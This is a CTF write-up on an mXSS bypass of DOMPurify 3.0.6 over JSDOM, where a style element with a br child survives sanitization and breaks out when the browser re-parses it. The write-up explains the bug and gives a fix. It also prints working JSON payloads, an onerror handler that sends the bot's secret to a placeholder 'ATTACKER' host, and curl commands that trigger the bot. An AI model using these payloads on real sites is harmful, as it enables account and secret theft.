web javascript xss mxss dompurify jsdom parser-differential rawtext ssr-sanitization puppeteer-bot client-side cve-2024-47875

A publishing app sanitizes a hand-built DOM tree with DOMPurify over JSDOM and ships the serialized string to a browser that re-parses it. A <style> rawtext breakout, hidden from DOMPurify by an element child, turns a "safe" tree into live XSS that steals the editor bot's secret.

inkpress — mXSS via server-side DOMPurify + JSDOM reparse

CTF: Midnight Flag Finals 2026 · Category: Web · Stack: Node / Express, DOMPurify 3.0.6, JSDOM 23.0.1, puppeteer-core

Challenge overview

Inkpress is a small publishing platform. You compose a "story" out of structured blocks, preview it, publish it to a shareable URL /p/:id, and can ask the editorial desk (a headless Chromium bot) to read it. The bot holds an httpOnly session cookie and the flag is the app SECRET, returned only to that session by /api/account:

app.get('/api/account', (req, res) => {
  const cookies = parseCookies(req.headers.cookie);
  if (cookies.session && cookies.session === editorSession) {
    return res.json({ role: 'editor', name: 'Editorial desk', secret: SECRET });
  }
  res.status(401).json({ error: 'sign in required' });
});

So the goal is classic: get XSS in the bot's browser, then fetch('/api/account') and exfiltrate secret.

How content is built and rendered

You don't submit raw HTML. You submit a JSON tree of { tag, attrs, children } blocks, and the server walks it into a real DOM with buildNode, sanitizes the whole <article> with DOMPurify running on a JSDOM window, and stores the serialized string (server.js):

function buildNode(document, spec, depth) {
  if (depth > 64) throw new Error('document nesting too deep');
  if (typeof spec.text === 'string') return document.createTextNode(spec.text);
  const tag = String(spec.tag || '').toLowerCase();
  if (!/^[a-z][a-z0-9]*$/.test(tag)) throw new Error('invalid tag name');
  const el = document.createElement(tag);
  if (spec.attrs && typeof spec.attrs === 'object') {
    for (const key of Object.keys(spec.attrs)) {
      if (!/^[a-zA-Z_:][\w:.-]*$/.test(key)) continue;
      try { el.setAttribute(key, String(spec.attrs[key])); } catch (e) {}
    }
  }
  if (Array.isArray(spec.children))
    for (const child of spec.children) el.appendChild(buildNode(document, child, depth + 1));
  return el;
}

function renderDocument(tree) {
  const window = new JSDOM('').window;
  const document = window.document;
  const DOMPurify = createDOMPurify(window);
  const root = document.createElement('article');
  // tree is the top-level array of block specs from the request body
  for (const node of tree) root.appendChild(buildNode(document, node, 0));
  return DOMPurify.sanitize(root);     // returns a STRING (the serialized <article>), stored as post.html
}
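
To see what buildNode actually constrains, here is a minimal sketch that mirrors its depth and tag checks on the JSON alone, without a DOM. The helper name checkSpec is hypothetical and attribute handling is left out. The point it illustrates: text is unrestricted, and any element may sit under any parent, including a child element under style, which an HTML parser would never produce.

```javascript
// Hypothetical helper: mirrors buildNode's depth and tag checks without a DOM.
// Returns the deepest level reached, or throws the same errors buildNode would.
function checkSpec(spec, depth = 0) {
  if (depth > 64) throw new Error('document nesting too deep');
  if (typeof spec.text === 'string') return depth; // text nodes: any content passes
  const tag = String(spec.tag || '').toLowerCase();
  if (!/^[a-z][a-z0-9]*$/.test(tag)) throw new Error('invalid tag name');
  let deepest = depth;
  if (Array.isArray(spec.children)) {
    for (const child of spec.children) {
      deepest = Math.max(deepest, checkSpec(child, depth + 1));
    }
  }
  return deepest;
}

// A <style> with a text child AND an element child is accepted as-is.
const tree = { tag: 'style', children: [{ text: '</style><b>hi</b>' }, { tag: 'br' }] };
console.log(checkSpec(tree)); // 1
```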

The published page /p/:id then drops that stored string into the DOM in the browser:

const data = ${data};                                    // { title, html }
document.getElementById('post').innerHTML = data.html;   // <-- re-parsed by Chromium

That last line is the whole bug surface. DOMPurify only promises that the node tree it returns is safe — not that the string you get from serializing it is safe to feed to a different HTML parser.

The core insight: two HTML engines

Sanitization happens server-side in JSDOM; insertion happens client-side in Chromium. Two HTML engines handle the same content:

  1. The server builds the tree through JSDOM's DOM API (no HTML parsing is involved) and DOMPurify sanitizes it.
  2. JSDOM serializes the clean tree to a string (the innerHTML getter).
  3. Chromium re-parses that string via element.innerHTML.

mXSS (mutation XSS) lives in step 2→3. The HTML serialization spec has rules that are perfectly safe as long as nobody re-parses the output — and we do re-parse it.

The key rule: rawtext-style elements (style, script, xmp, iframe, noembed, noframes, plaintext, and noscript when scripting is enabled) serialize their text content literally, without escaping. textarea and title are not on that list: their text is escaped on serialization. A </style> inside a <style> text node serializes as the raw bytes </style>, not &lt;/style&gt;. To JSDOM that's inert character data nested in a node. To Chromium re-parsing it, that </style> closes the element early and everything after becomes live markup.
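
The serialization rule can be sketched in a few lines. This is a simplified model over plain { tag, children } / { text } objects, not JSDOM's actual serializer: attributes are omitted and the void-element list is cut down to what the example needs.

```javascript
// Parents whose text children are emitted without escaping, per the HTML
// fragment serialization algorithm (noscript also qualifies when scripting is on).
const LITERAL_TEXT_PARENTS = new Set([
  'style', 'script', 'xmp', 'iframe', 'noembed', 'noframes', 'plaintext',
]);
// Reduced void-element list, enough for this sketch.
const VOID_ELEMENTS = new Set(['br', 'img', 'hr', 'input']);

function escapeText(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/\u00A0/g, '&nbsp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

function serialize(node, parentTag = null) {
  if (typeof node.text === 'string') {
    // The whole bug: text under a literal-text parent is copied verbatim.
    return LITERAL_TEXT_PARENTS.has(parentTag) ? node.text : escapeText(node.text);
  }
  if (VOID_ELEMENTS.has(node.tag)) return `<${node.tag}>`;
  const inner = (node.children || []).map((c) => serialize(c, node.tag)).join('');
  return `<${node.tag}>${inner}</${node.tag}>`;
}

const text = { text: '</style><img src=1 onerror=alert(1)>' };
console.log(serialize({ tag: 'p', children: [text] }));
// <p>&lt;/style&gt;&lt;img src=1 onerror=alert(1)&gt;</p>
console.log(serialize({ tag: 'style', children: [text, { tag: 'br' }] }));
// <style></style><img src=1 onerror=alert(1)><br></style>
```

The same text node is harmless under p and a breakout under style; only the parent changed.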

Defeating DOMPurify's anti-mXSS gate

DOMPurify 3.0.6 has one defense that matters for a <style> breakout. In _sanitizeElements it force-removes an element whose children are text only but whose text looks like markup:

// purify.cjs.js (3.0.6)
if (currentNode.hasChildNodes()
    && !_isNode(currentNode.firstElementChild)   // no ELEMENT child
    && regExpTest(/<[/\w]/g, currentNode.innerHTML)
    && regExpTest(/<[/\w]/g, currentNode.textContent)) {
  _forceRemove(currentNode);                      // a text-only <style>...</style> gets killed
}

A <style> whose only child is our breakout text is removed. But the gate short-circuits the moment the element has an element child: firstElementChild becomes non-null, so !_isNode(currentNode.firstElementChild) is false and the entire condition fails.

Because the challenge lets us build the node tree by hand, we just give <style> two children:

  • a harmless element child (<br>) → firstElementChild is non-null → gate skipped, <style> survives;
  • a text child carrying </style><img ... onerror=...> → DOMPurify (default config, SAFE_FOR_TEMPLATES unset) never treats text inside a rawtext element as markup, so onerror is never seen, never stripped.

This element-child bypass is patched in DOMPurify 3.1+.
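
The gate's decision can be modeled on the same plain-object tree shape. This is a simplified sketch, not DOMPurify code: the function name is hypothetical, and it only applies to rawtext elements such as style, where innerHTML and textContent are the same string for a text-only node (so one regex test stands in for both).

```javascript
// Concatenated text of a { tag, children } / { text } node.
function textContent(node) {
  if (typeof node.text === 'string') return node.text;
  return (node.children || []).map(textContent).join('');
}

// true  -> the 3.0.6 check would force-remove this rawtext element
// false -> the element survives sanitization
function gateRemovesRawtext(node) {
  const children = node.children || [];
  const hasElementChild = children.some((c) => typeof c.tag === 'string');
  return children.length > 0      // hasChildNodes()
    && !hasElementChild           // firstElementChild is null
    && /<[/\w]/.test(textContent(node)); // text looks like markup
}

const breakout = { text: '</style><img src=1 onerror=alert(1)>' };
console.log(gateRemovesRawtext({ tag: 'style', children: [breakout] }));
// true
console.log(gateRemovesRawtext({ tag: 'style', children: [breakout, { tag: 'br' }] }));
// false
```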

What each engine sees

DOMPurify walks this and calls it clean (text is opaque inside style):

article
└─ style
   ├─ #text  "</style><img src=1 onerror=alert(1)>"   ← opaque chars to JSDOM
   └─ br                                                ← makes firstElementChild non-null

JSDOM serializes the text node literally (rawtext rule):

<article><style></style><img src=1 onerror=alert(1)><br></style></article>

Chromium re-parses that string: the first </style> closes the style early, <img> becomes a real, live element, onerror fires.
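
The browser side can be approximated too. Inside <style> the tokenizer treats everything as text until the first matching end tag, so a rough model (a sketch, not Chromium's implementation; splitRawtext is a hypothetical name) is "find the first </style followed by whitespace, / or >":

```javascript
// `html` is the markup that follows an opening <style> tag.
// Returns the element's text content and the markup parsed after it closes.
function splitRawtext(html, tag = 'style') {
  const endTag = new RegExp(`</${tag}[\\t\\n\\f\\r />]`, 'i');
  const m = endTag.exec(html);
  if (!m) return { content: html, rest: '' }; // never closed: all of it is text
  const close = html.indexOf('>', m.index);
  return {
    content: html.slice(0, m.index),
    rest: close === -1 ? '' : html.slice(close + 1),
  };
}

const afterOpenTag = '</style><img src=1 onerror=alert(1)><br></style>';
const { content, rest } = splitRawtext(afterOpenTag);
console.log(JSON.stringify(content)); // ""
console.log(rest);                    // <img src=1 onerror=alert(1)><br></style>
```

The style element ends up empty and the img lands in normal markup context; the trailing </style> has no open element to close and is ignored.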

Exploit

The JSON tree that proves XSS:

[
  {
    "tag": "style",
    "children": [
      { "text": "</style><img src=1 onerror=alert(1)>" },
      { "tag": "br" }
    ]
  }
]

Weaponized to steal the flag. The onerror value must be double-quoted: an unquoted attribute value ends at the first whitespace or >, and the arrow functions contain >:

[
  {
    "tag": "style",
    "children": [
      { "text": "</style><img src=1 onerror=\"fetch('/api/account').then(r=>r.text()).then(s=>location='https://ATTACKER/?'+encodeURIComponent(s))\">" },
      { "tag": "br" }
    ]
  }
]
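
How the re-parse delimits an attribute value decides whether the handler arrives intact. The sketch below models only where the value ends (both function names are hypothetical, and character references are ignored): an unquoted value stops at whitespace or >, a double-quoted one stops at the next ".

```javascript
// `s` starts at the first character of an unquoted attribute value.
function unquotedAttrValue(s) {
  return /^[^\t\n\f\r >]*/.exec(s)[0];
}

// `s` starts right after the opening double quote.
function doubleQuotedAttrValue(s) {
  const end = s.indexOf('"');
  return end === -1 ? s : s.slice(0, end);
}

const handler = "fetch('/x').then(r=>r.text())";
console.log(unquotedAttrValue(handler + '>'));
// fetch('/x').then(r=
console.log(doubleQuotedAttrValue(handler + '">'));
// fetch('/x').then(r=>r.text())
```

An arrow function in an unquoted handler is cut at its own >, leaving a syntax error; quoting the value (or avoiding > and whitespace entirely) keeps the body whole.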

Publish it, then request a review so the editor bot opens /p/:id (the bot dwells ~5s, plenty of time):

# 1) publish, capture the id
ID=$(curl -s http://TARGET/api/posts -H 'Content-Type: application/json' \
  -d '{"title":"x","tree":[{"tag":"style","children":[{"text":"</style><img src=1 onerror=\"fetch(`/api/account`).then(r=>r.text()).then(s=>location=`https://ATTACKER/?`+encodeURIComponent(s))\">"},{"tag":"br"}]}]}' \
  | python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')

# 2) make the editor bot read it
curl -s http://TARGET/api/review -H 'Content-Type: application/json' -d "{\"id\":\"$ID\"}"

The bot loads the page, the re-parsed <img> fires onerror, fetch('/api/account') returns { ..., secret: FLAG }, and it's sent to your listener.
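
On the listener side, the payload puts the URL-encoded /api/account response body directly after the ? in the request URL. A minimal sketch for pulling the secret back out of a logged request line (the helper name is hypothetical; it assumes the body is the JSON shown in the /api/account handler):

```javascript
// `requestUrl` is the path + query the listener received, e.g. "/?%7B%22role%22...".
// Returns the secret string, or null if the query is not the expected JSON.
function extractSecret(requestUrl) {
  try {
    const query = requestUrl.slice(requestUrl.indexOf('?') + 1);
    const parsed = JSON.parse(decodeURIComponent(query));
    return parsed.secret ?? null;
  } catch (e) {
    return null; // malformed escape sequence or non-JSON body
  }
}

// Simulate what the bot's browser would send (placeholder secret value).
const sample = '/?' + encodeURIComponent(
  JSON.stringify({ role: 'editor', name: 'Editorial desk', secret: 'FLAG' })
);
console.log(extractSecret(sample)); // FLAG
```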

Why the "obvious" path was a dead end

The first instinct (and a lot of wasted time during the CTF) was the deep-nesting DOMPurify CVE (CVE-2024-47875): wrapping <img> in ~500 nested <div>s to trigger a nesting-based mutation. That doesn't apply here: the app caps depth at 64 and rejects malformed tags. More importantly, the real bug isn't that CVE at all. It's a serialization/reparse mXSS that exists by design when you sanitize server-side and re-parse client-side. The fix is either to run DOMPurify in the browser and insert via RETURN_DOM_FRAGMENT + replaceChildren (so the string is never re-parsed), or to upgrade DOMPurify and stop trusting serialized output across parser boundaries.

Takeaways (generalized technique)

  • DOMPurify.sanitize(x) returning a string that is later fed to another HTML parser is an mXSS smell. The guarantee is about nodes, not strings.
  • Server-side sanitization (JSDOM) + client-side innerHTML = two engines = a gap.
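  • Rawtext-style elements (style, script, xmp, iframe, noembed, noframes, plaintext; noscript when scripting is enabled) serialize inner text unescaped, which makes them prime breakout vectors. textarea and title text is escaped on serialization.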
  • On DOMPurify ≤ 3.0.x, give a rawtext element an element child (<br>) to skip the firstElementChild anti-mXSS gate.
  • Safe usage: DOMPurify.sanitize(dirty, { RETURN_DOM_FRAGMENT: true }) then replaceChildren(frag) — no re-parse, no gap.
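
The safe-usage bullet, written out as a small browser-side sketch. The function name is hypothetical; the DOMPurify instance and target element are passed in as parameters so nothing depends on globals.

```javascript
// purifier:  a DOMPurify instance (window.DOMPurify in the page)
// container: the element that should display the content
// dirty:     untrusted HTML
function renderSanitized(purifier, container, dirty) {
  // RETURN_DOM_FRAGMENT makes sanitize() return a DocumentFragment, not a string.
  const fragment = purifier.sanitize(dirty, { RETURN_DOM_FRAGMENT: true });
  // The sanitized nodes are moved into the page directly:
  // no serialization step, so no second parse that could mutate them.
  container.replaceChildren(fragment);
  return container;
}

// In the page, roughly:
// renderSanitized(DOMPurify, document.getElementById('post'), untrustedHtml);
```

The sanitizer and the renderer are then the same engine working on the same nodes, which is the case DOMPurify's guarantee covers.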

Sources & references